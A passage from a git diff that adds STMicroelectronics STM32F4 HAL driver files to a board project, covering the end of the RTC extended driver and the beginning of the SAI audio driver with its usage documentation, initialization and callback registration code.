HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + else + { + __HAL_RTC_CLOCKREF_DETECTION_DISABLE(hrtc); + + /* Exit Initialization mode */ + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Enables the Bypass Shadow feature. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @note When the Bypass Shadow is enabled the calendar value are taken + * directly from the Calendar counter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_EnableBypassShadow(RTC_HandleTypeDef* hrtc) +{ + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set the BYPSHAD bit */ + hrtc->Instance->CR |= (uint8_t)RTC_CR_BYPSHAD; + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Disables the Bypass Shadow feature. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @note When the Bypass Shadow is enabled the calendar value are taken + * directly from the Calendar counter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_DisableBypassShadow(RTC_HandleTypeDef* hrtc) +{ + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Reset the BYPSHAD bit */ + hrtc->Instance->CR &= (uint8_t)~RTC_CR_BYPSHAD; + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @} + */ + + /** @defgroup RTCEx_Exported_Functions_Group4 Extended features functions + * @brief Extended features functions + * +@verbatim + =============================================================================== + ##### Extended features functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) RTC Alarm B callback + (+) RTC Poll for Alarm B request + +@endverbatim + * @{ + */ + +/** + * @brief Alarm B callback. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTCEx_AlarmBEventCallback(RTC_HandleTypeDef *hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RTC_AlarmBEventCallback could be implemented in the user file + */ +} + +/** + * @brief This function handles AlarmB Polling request. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_PollForAlarmBEvent(RTC_HandleTypeDef *hrtc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRBF) == RESET) + { + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hrtc->State = HAL_RTC_STATE_TIMEOUT; + return HAL_TIMEOUT; + } + } + } + + /* Clear the Alarm Flag */ + __HAL_RTC_ALARM_CLEAR_FLAG(hrtc, RTC_FLAG_ALRBF); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_RTC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sai.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sai.c new file mode 100644 index 000000000..7d157ccbc --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sai.c @@ -0,0 +1,2556 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_sai.c + * @author MCD Application Team + * @brief SAI HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Serial Audio Interface (SAI) peripheral: + * + Initialization/de-initialization functions + * + I/O operation functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + + [..] + The SAI HAL driver can be used as follows: + + (#) Declare a SAI_HandleTypeDef handle structure (eg. SAI_HandleTypeDef hsai). + (#) Initialize the SAI low level resources by implementing the HAL_SAI_MspInit() API: + (##) Enable the SAI interface clock. + (##) SAI pins configuration: + (+++) Enable the clock for the SAI GPIOs. + (+++) Configure these SAI pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_SAI_Transmit_IT() + and HAL_SAI_Receive_IT() APIs): + (+++) Configure the SAI interrupt priority. + (+++) Enable the NVIC SAI IRQ handle. + + (##) DMA Configuration if you need to use DMA process (HAL_SAI_Transmit_DMA() + and HAL_SAI_Receive_DMA() APIs): + (+++) Declare a DMA handle structure for the Tx/Rx stream. + (+++) Enable the DMAx interface clock. + (+++) Configure the declared DMA handle structure with the required Tx/Rx parameters. + (+++) Configure the DMA Tx/Rx Stream. + (+++) Associate the initialized DMA handle to the SAI DMA Tx/Rx handle. + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on the + DMA Tx/Rx Stream. + + (#) The initialization can be done by two ways + (##) Expert mode : Initialize the structures Init, FrameInit and SlotInit and call HAL_SAI_Init(). + (##) Simplified mode : Initialize the high part of Init Structure and call HAL_SAI_InitProtocol(). + + [..] + (@) The specific SAI interrupts (FIFO request and Overrun underrun interrupt) + will be managed using the macros __HAL_SAI_ENABLE_IT() and __HAL_SAI_DISABLE_IT() + inside the transmit and receive process. + + [..] + (@) SAI Clock Source configuration is managed differently depending on the selected + STM32F4 devices : + (+@) For STM32F446xx devices, the configuration is managed through RCCEx_PeriphCLKConfig() + function in the HAL RCC drivers + (+@) For STM32F439xx/STM32F437xx/STM32F429xx/STM32F427xx devices, the configuration + is managed within HAL SAI drivers through HAL_SAI_Init() function using + ClockSource field of SAI_InitTypeDef structure. + [..] + (@) Make sure that either: + (+@) I2S PLL is configured or + (+@) SAI PLL is configured or + (+@) External clock source is configured after setting correctly + the define constant EXTERNAL_CLOCK_VALUE in the stm32f4xx_hal_conf.h file. + [..] + (@) In master Tx mode: enabling the audio block immediately generates the bit clock + for the external slaves even if there is no data in the FIFO, However FS signal + generation is conditioned by the presence of data in the FIFO. + + [..] + (@) In master Rx mode: enabling the audio block immediately generates the bit clock + and FS signal for the external slaves. + + [..] + (@) It is mandatory to respect the following conditions in order to avoid bad SAI behavior: + (+@) First bit Offset <= (SLOT size - Data size) + (+@) Data size <= SLOT size + (+@) Number of SLOT x SLOT size = Frame length + (+@) The number of slots should be even when SAI_FS_CHANNEL_IDENTIFICATION is selected. + + [..] + Three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Send an amount of data in blocking mode using HAL_SAI_Transmit() + (+) Receive an amount of data in blocking mode using HAL_SAI_Receive() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Send an amount of data in non-blocking mode using HAL_SAI_Transmit_IT() + (+) At transmission end of transfer HAL_SAI_TxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SAI_TxCpltCallback() + (+) Receive an amount of data in non-blocking mode using HAL_SAI_Receive_IT() + (+) At reception end of transfer HAL_SAI_RxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SAI_RxCpltCallback() + (+) In case of flag error, HAL_SAI_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_SAI_ErrorCallback() + + *** DMA mode IO operation *** + ============================= + [..] + (+) Send an amount of data in non-blocking mode (DMA) using HAL_SAI_Transmit_DMA() + (+) At transmission end of transfer HAL_SAI_TxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SAI_TxCpltCallback() + (+) Receive an amount of data in non-blocking mode (DMA) using HAL_SAI_Receive_DMA() + (+) At reception end of transfer HAL_SAI_RxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SAI_RxCpltCallback() + (+) In case of flag error, HAL_SAI_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_SAI_ErrorCallback() + (+) Pause the DMA Transfer using HAL_SAI_DMAPause() + (+) Resume the DMA Transfer using HAL_SAI_DMAResume() + (+) Stop the DMA Transfer using HAL_SAI_DMAStop() + + *** SAI HAL driver additional function list *** + =============================================== + [..] + Below the list the others API available SAI HAL driver : + + (+) HAL_SAI_EnableTxMuteMode(): Enable the mute in tx mode + (+) HAL_SAI_DisableTxMuteMode(): Disable the mute in tx mode + (+) HAL_SAI_EnableRxMuteMode(): Enable the mute in Rx mode + (+) HAL_SAI_DisableRxMuteMode(): Disable the mute in Rx mode + (+) HAL_SAI_FlushRxFifo(): Flush the rx fifo. + (+) HAL_SAI_Abort(): Abort the current transfer + + *** SAI HAL driver macros list *** + ================================== + [..] + Below the list of most used macros in SAI HAL driver : + + (+) __HAL_SAI_ENABLE(): Enable the SAI peripheral + (+) __HAL_SAI_DISABLE(): Disable the SAI peripheral + (+) __HAL_SAI_ENABLE_IT(): Enable the specified SAI interrupts + (+) __HAL_SAI_DISABLE_IT(): Disable the specified SAI interrupts + (+) __HAL_SAI_GET_IT_SOURCE(): Check if the specified SAI interrupt source is + enabled or disabled + (+) __HAL_SAI_GET_FLAG(): Check whether the specified SAI flag is set or not + + *** Callback registration *** + ============================= + [..] + The compilation define USE_HAL_SAI_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use functions HAL_SAI_RegisterCallback() to register a user callback. + + [..] + Function HAL_SAI_RegisterCallback() allows to register following callbacks: + (+) RxCpltCallback : SAI receive complete. + (+) RxHalfCpltCallback : SAI receive half complete. + (+) TxCpltCallback : SAI transmit complete. + (+) TxHalfCpltCallback : SAI transmit half complete. + (+) ErrorCallback : SAI error. + (+) MspInitCallback : SAI MspInit. + (+) MspDeInitCallback : SAI MspDeInit. + [..] + This function takes as parameters the HAL peripheral handle, the callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_SAI_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + HAL_SAI_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the callback ID. + [..] + This function allows to reset following callbacks: + (+) RxCpltCallback : SAI receive complete. + (+) RxHalfCpltCallback : SAI receive half complete. + (+) TxCpltCallback : SAI transmit complete. + (+) TxHalfCpltCallback : SAI transmit half complete. + (+) ErrorCallback : SAI error. + (+) MspInitCallback : SAI MspInit. + (+) MspDeInitCallback : SAI MspDeInit. + + [..] + By default, after the HAL_SAI_Init and if the state is HAL_SAI_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions: + examples HAL_SAI_RxCpltCallback(), HAL_SAI_ErrorCallback(). + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the HAL_SAI_Init + and HAL_SAI_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_SAI_Init and HAL_SAI_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_SAI_RegisterCallback before calling HAL_SAI_DeInit + or HAL_SAI_Init function. + + [..] + When the compilation define USE_HAL_SAI_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SAI SAI + * @brief SAI HAL module driver + * @{ + */ + +#ifdef HAL_SAI_MODULE_ENABLED + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F413xx) ||\ + defined(STM32F423xx) + +/** @defgroup SAI_Private_Typedefs SAI Private Typedefs + * @{ + */ +typedef enum +{ + SAI_MODE_DMA, + SAI_MODE_IT +} SAI_ModeTypedef; +/** + * @} + */ + +/* Private define ------------------------------------------------------------*/ + +/** @defgroup SAI_Private_Constants SAI Private Constants + * @{ + */ +#define SAI_DEFAULT_TIMEOUT 4U /* 4ms */ +#define SAI_LONG_TIMEOUT 1000U /* 1s */ +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup SAI_Private_Functions SAI Private Functions + * @{ + */ +static void SAI_FillFifo(SAI_HandleTypeDef *hsai); +static uint32_t SAI_InterruptFlag(SAI_HandleTypeDef *hsai, uint32_t mode); +static HAL_StatusTypeDef SAI_InitI2S(SAI_HandleTypeDef *hsai, uint32_t protocol, uint32_t datasize, uint32_t nbslot); +static HAL_StatusTypeDef SAI_InitPCM(SAI_HandleTypeDef *hsai, uint32_t protocol, uint32_t datasize, uint32_t nbslot); + +static HAL_StatusTypeDef SAI_Disable(SAI_HandleTypeDef *hsai); +static void SAI_Transmit_IT8Bit(SAI_HandleTypeDef *hsai); +static void SAI_Transmit_IT16Bit(SAI_HandleTypeDef *hsai); +static void SAI_Transmit_IT32Bit(SAI_HandleTypeDef *hsai); +static void SAI_Receive_IT8Bit(SAI_HandleTypeDef *hsai); +static void SAI_Receive_IT16Bit(SAI_HandleTypeDef *hsai); +static void SAI_Receive_IT32Bit(SAI_HandleTypeDef *hsai); + +static void SAI_DMATxCplt(DMA_HandleTypeDef *hdma); +static void SAI_DMATxHalfCplt(DMA_HandleTypeDef *hdma); +static void SAI_DMARxCplt(DMA_HandleTypeDef *hdma); +static void SAI_DMARxHalfCplt(DMA_HandleTypeDef *hdma); +static void SAI_DMAError(DMA_HandleTypeDef *hdma); +static void SAI_DMAAbort(DMA_HandleTypeDef *hdma); +/** + * @} + */ + +/* Exported functions ---------------------------------------------------------*/ +/** @defgroup SAI_Exported_Functions SAI Exported Functions + * @{ + */ + +/** @defgroup SAI_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + de-initialize the SAIx peripheral: + + (+) User must implement HAL_SAI_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, DMA, IT and NVIC ). + + (+) Call the function HAL_SAI_Init() to configure the selected device with + the selected configuration: + (++) Mode (Master/slave TX/RX) + (++) Protocol + (++) Data Size + (++) MCLK Output + (++) Audio frequency + (++) FIFO Threshold + (++) Frame Config + (++) Slot Config + + (+) Call the function HAL_SAI_DeInit() to restore the default configuration + of the selected SAI peripheral. + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the structure FrameInit, SlotInit and the low part of + * Init according to the specified parameters and call the function + * HAL_SAI_Init to initialize the SAI block. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param protocol one of the supported protocol @ref SAI_Protocol + * @param datasize one of the supported datasize @ref SAI_Protocol_DataSize + * the configuration information for SAI module. + * @param nbslot Number of slot. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_InitProtocol(SAI_HandleTypeDef *hsai, uint32_t protocol, uint32_t datasize, uint32_t nbslot) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_SAI_SUPPORTED_PROTOCOL(protocol)); + assert_param(IS_SAI_PROTOCOL_DATASIZE(datasize)); + + switch (protocol) + { + case SAI_I2S_STANDARD : + case SAI_I2S_MSBJUSTIFIED : + case SAI_I2S_LSBJUSTIFIED : + status = SAI_InitI2S(hsai, protocol, datasize, nbslot); + break; + case SAI_PCM_LONG : + case SAI_PCM_SHORT : + status = SAI_InitPCM(hsai, protocol, datasize, nbslot); + break; + default : + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + status = HAL_SAI_Init(hsai); + } + + return status; +} + +/** + * @brief Initialize the SAI according to the specified parameters. + * in the SAI_InitTypeDef structure and initialize the associated handle. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_Init(SAI_HandleTypeDef *hsai) +{ + uint32_t tmpregisterGCR = 0U; + + /* This variable used to store the SAI_CK_x (value in Hz) */ + uint32_t freq = 0U; + + /* This variable is used to compute CKSTR bits of SAI CR1 according to + ClockStrobing and AudioMode fields */ + uint32_t ckstr_bits = 0U; + uint32_t syncen_bits = 0U; + + /* Check the SAI handle allocation */ + if (hsai == NULL) + { + return HAL_ERROR; + } + + /* check the instance */ + assert_param(IS_SAI_ALL_INSTANCE(hsai->Instance)); + + /* Check the SAI Block parameters */ + assert_param(IS_SAI_AUDIO_FREQUENCY(hsai->Init.AudioFrequency)); + assert_param(IS_SAI_BLOCK_PROTOCOL(hsai->Init.Protocol)); + assert_param(IS_SAI_BLOCK_MODE(hsai->Init.AudioMode)); + assert_param(IS_SAI_BLOCK_SYNCEXT(hsai->Init.SynchroExt)); + assert_param(IS_SAI_BLOCK_DATASIZE(hsai->Init.DataSize)); + assert_param(IS_SAI_BLOCK_FIRST_BIT(hsai->Init.FirstBit)); + assert_param(IS_SAI_BLOCK_CLOCK_STROBING(hsai->Init.ClockStrobing)); + assert_param(IS_SAI_BLOCK_SYNCHRO(hsai->Init.Synchro)); + assert_param(IS_SAI_BLOCK_OUTPUT_DRIVE(hsai->Init.OutputDrive)); + assert_param(IS_SAI_BLOCK_NODIVIDER(hsai->Init.NoDivider)); + assert_param(IS_SAI_BLOCK_FIFO_THRESHOLD(hsai->Init.FIFOThreshold)); + assert_param(IS_SAI_MONO_STEREO_MODE(hsai->Init.MonoStereoMode)); + assert_param(IS_SAI_BLOCK_COMPANDING_MODE(hsai->Init.CompandingMode)); + assert_param(IS_SAI_BLOCK_TRISTATE_MANAGEMENT(hsai->Init.TriState)); + + /* Check the SAI Block Frame parameters */ + assert_param(IS_SAI_BLOCK_FRAME_LENGTH(hsai->FrameInit.FrameLength)); + assert_param(IS_SAI_BLOCK_ACTIVE_FRAME(hsai->FrameInit.ActiveFrameLength)); + assert_param(IS_SAI_BLOCK_FS_DEFINITION(hsai->FrameInit.FSDefinition)); + assert_param(IS_SAI_BLOCK_FS_POLARITY(hsai->FrameInit.FSPolarity)); + assert_param(IS_SAI_BLOCK_FS_OFFSET(hsai->FrameInit.FSOffset)); + + /* Check the SAI Block Slot parameters */ + assert_param(IS_SAI_BLOCK_FIRSTBIT_OFFSET(hsai->SlotInit.FirstBitOffset)); + assert_param(IS_SAI_BLOCK_SLOT_SIZE(hsai->SlotInit.SlotSize)); + assert_param(IS_SAI_BLOCK_SLOT_NUMBER(hsai->SlotInit.SlotNumber)); + assert_param(IS_SAI_SLOT_ACTIVE(hsai->SlotInit.SlotActive)); + + if (hsai->State == HAL_SAI_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hsai->Lock = HAL_UNLOCKED; + +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + /* Reset callback pointers to the weak predefined callbacks */ + hsai->RxCpltCallback = HAL_SAI_RxCpltCallback; + hsai->RxHalfCpltCallback = HAL_SAI_RxHalfCpltCallback; + hsai->TxCpltCallback = HAL_SAI_TxCpltCallback; + hsai->TxHalfCpltCallback = HAL_SAI_TxHalfCpltCallback; + hsai->ErrorCallback = HAL_SAI_ErrorCallback; + + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + if (hsai->MspInitCallback == NULL) + { + hsai->MspInitCallback = HAL_SAI_MspInit; + } + hsai->MspInitCallback(hsai); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_SAI_MspInit(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + + hsai->State = HAL_SAI_STATE_BUSY; + + /* Disable the selected SAI peripheral */ + SAI_Disable(hsai); + + /* SAI Block Synchro Configuration -----------------------------------------*/ + SAI_BlockSynchroConfig(hsai); + + /* Configure Master Clock using the following formula : + MCLK_x = SAI_CK_x / (MCKDIV[3:0] * 2) with MCLK_x = 256 * FS + FS = SAI_CK_x / (MCKDIV[3:0] * 2) * 256 + MCKDIV[3:0] = SAI_CK_x / FS * 512 */ + if (hsai->Init.AudioFrequency != SAI_AUDIO_FREQUENCY_MCKDIV) + { + /* Get SAI clock source based on Source clock selection from RCC */ + freq = SAI_GetInputClock(hsai); + + /* (saiclocksource x 10) to keep Significant digits */ + tmpregisterGCR = (((freq * 10U) / ((hsai->Init.AudioFrequency) * 512U))); + + hsai->Init.Mckdiv = tmpregisterGCR / 10U; + + /* Round result to the nearest integer */ + if ((tmpregisterGCR % 10U) > 8U) + { + hsai->Init.Mckdiv += 1U; + } + + /* For SPDIF protocol, SAI shall provide a bit clock twice faster the symbol-rate */ + if (hsai->Init.Protocol == SAI_SPDIF_PROTOCOL) + { + hsai->Init.Mckdiv = hsai->Init.Mckdiv >> 1; + } + } + + /* Check the SAI Block master clock divider parameter */ + assert_param(IS_SAI_BLOCK_MASTER_DIVIDER(hsai->Init.Mckdiv)); + + /* Compute CKSTR bits of SAI CR1 according to ClockStrobing and AudioMode */ + if ((hsai->Init.AudioMode == SAI_MODEMASTER_TX) || (hsai->Init.AudioMode == SAI_MODESLAVE_TX)) + { + ckstr_bits = (hsai->Init.ClockStrobing == SAI_CLOCKSTROBING_RISINGEDGE) ? 0U : SAI_xCR1_CKSTR; + } + else + { + ckstr_bits = (hsai->Init.ClockStrobing == SAI_CLOCKSTROBING_RISINGEDGE) ? SAI_xCR1_CKSTR : 0U; + } + + /* SAI Block Configuration -------------------------------------------------*/ + switch (hsai->Init.Synchro) + { + case SAI_ASYNCHRONOUS : + { + syncen_bits = 0U; + } + break; + case SAI_SYNCHRONOUS : + { + syncen_bits = SAI_xCR1_SYNCEN_0; + } + break; + case SAI_SYNCHRONOUS_EXT_SAI1 : + case SAI_SYNCHRONOUS_EXT_SAI2 : + { + syncen_bits = SAI_xCR1_SYNCEN_1; + } + break; + default: + break; + } + + /* SAI CR1 Configuration */ + hsai->Instance->CR1 &= ~(SAI_xCR1_MODE | SAI_xCR1_PRTCFG | SAI_xCR1_DS | \ + SAI_xCR1_LSBFIRST | SAI_xCR1_CKSTR | SAI_xCR1_SYNCEN | \ + SAI_xCR1_MONO | SAI_xCR1_OUTDRIV | SAI_xCR1_DMAEN | \ + SAI_xCR1_NODIV | SAI_xCR1_MCKDIV); + + hsai->Instance->CR1 |= (hsai->Init.AudioMode | hsai->Init.Protocol | \ + hsai->Init.DataSize | hsai->Init.FirstBit | \ + ckstr_bits | syncen_bits | \ + hsai->Init.MonoStereoMode | hsai->Init.OutputDrive | \ + hsai->Init.NoDivider | (hsai->Init.Mckdiv << 20U)); + + /* SAI CR2 Configuration */ + hsai->Instance->CR2 &= ~(SAI_xCR2_FTH | SAI_xCR2_FFLUSH | SAI_xCR2_COMP | SAI_xCR2_CPL); + hsai->Instance->CR2 |= (hsai->Init.FIFOThreshold | hsai->Init.CompandingMode | hsai->Init.TriState); + + /* SAI Frame Configuration -----------------------------------------*/ + hsai->Instance->FRCR &= (~(SAI_xFRCR_FRL | SAI_xFRCR_FSALL | SAI_xFRCR_FSDEF | \ + SAI_xFRCR_FSPOL | SAI_xFRCR_FSOFF)); + hsai->Instance->FRCR |= ((hsai->FrameInit.FrameLength - 1U) | + hsai->FrameInit.FSOffset | + hsai->FrameInit.FSDefinition | + hsai->FrameInit.FSPolarity | + ((hsai->FrameInit.ActiveFrameLength - 1U) << 8U)); + + /* SAI Block_x SLOT Configuration ------------------------------------------*/ + /* This register has no meaning in AC 97 and SPDIF audio protocol */ + hsai->Instance->SLOTR &= ~(SAI_xSLOTR_FBOFF | SAI_xSLOTR_SLOTSZ | \ + SAI_xSLOTR_NBSLOT | SAI_xSLOTR_SLOTEN); + + hsai->Instance->SLOTR |= hsai->SlotInit.FirstBitOffset | hsai->SlotInit.SlotSize | \ + (hsai->SlotInit.SlotActive << 16U) | ((hsai->SlotInit.SlotNumber - 1U) << 8U); + + /* Initialize the error code */ + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + + /* Initialize the SAI state */ + hsai->State = HAL_SAI_STATE_READY; + + /* Release Lock */ + __HAL_UNLOCK(hsai); + + return HAL_OK; +} + +/** + * @brief DeInitialize the SAI peripheral. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SAI_DeInit(SAI_HandleTypeDef *hsai) +{ + /* Check the SAI handle allocation */ + if (hsai == NULL) + { + return HAL_ERROR; + } + + hsai->State = HAL_SAI_STATE_BUSY; + + /* Disabled All interrupt and clear all the flag */ + hsai->Instance->IMR = 0U; + hsai->Instance->CLRFR = 0xFFFFFFFFU; + + /* Disable the SAI */ + SAI_Disable(hsai); + + /* Flush the fifo */ + SET_BIT(hsai->Instance->CR2, SAI_xCR2_FFLUSH); + + /* DeInit the low level hardware: GPIO, CLOCK, NVIC and DMA */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + if (hsai->MspDeInitCallback == NULL) + { + hsai->MspDeInitCallback = HAL_SAI_MspDeInit; + } + hsai->MspDeInitCallback(hsai); +#else + HAL_SAI_MspDeInit(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + + /* Initialize the error code */ + hsai->ErrorCode = HAL_SAI_ERROR_NONE; + + /* Initialize the SAI state */ + hsai->State = HAL_SAI_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hsai); + + return HAL_OK; +} + +/** + * @brief Initialize the SAI MSP. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +__weak void HAL_SAI_MspInit(SAI_HandleTypeDef *hsai) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsai); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SAI_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize the SAI MSP. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +__weak void HAL_SAI_MspDeInit(SAI_HandleTypeDef *hsai) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsai); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SAI_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) +/** + * @brief Register a user SAI callback + * to be used instead of the weak predefined callback. + * @param hsai SAI handle. + * @param CallbackID ID of the callback to be registered. + * This parameter can be one of the following values: + * @arg @ref HAL_SAI_RX_COMPLETE_CB_ID receive complete callback ID. + * @arg @ref HAL_SAI_RX_HALFCOMPLETE_CB_ID receive half complete callback ID. + * @arg @ref HAL_SAI_TX_COMPLETE_CB_ID transmit complete callback ID. + * @arg @ref HAL_SAI_TX_HALFCOMPLETE_CB_ID transmit half complete callback ID. + * @arg @ref HAL_SAI_ERROR_CB_ID error callback ID. + * @arg @ref HAL_SAI_MSPINIT_CB_ID MSP init callback ID. + * @arg @ref HAL_SAI_MSPDEINIT_CB_ID MSP de-init callback ID. + * @param pCallback pointer to the callback function. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_SAI_RegisterCallback(SAI_HandleTypeDef *hsai, + HAL_SAI_CallbackIDTypeDef CallbackID, + pSAI_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* update the error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + else + { + if (HAL_SAI_STATE_READY == hsai->State) + { + switch (CallbackID) + { + case HAL_SAI_RX_COMPLETE_CB_ID : + hsai->RxCpltCallback = pCallback; + break; + case HAL_SAI_RX_HALFCOMPLETE_CB_ID : + hsai->RxHalfCpltCallback = pCallback; + break; + case HAL_SAI_TX_COMPLETE_CB_ID : + hsai->TxCpltCallback = pCallback; + break; + case HAL_SAI_TX_HALFCOMPLETE_CB_ID : + hsai->TxHalfCpltCallback = pCallback; + break; + case HAL_SAI_ERROR_CB_ID : + hsai->ErrorCallback = pCallback; + break; + case HAL_SAI_MSPINIT_CB_ID : + hsai->MspInitCallback = pCallback; + break; + case HAL_SAI_MSPDEINIT_CB_ID : + hsai->MspDeInitCallback = pCallback; + break; + default : + /* update the error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + 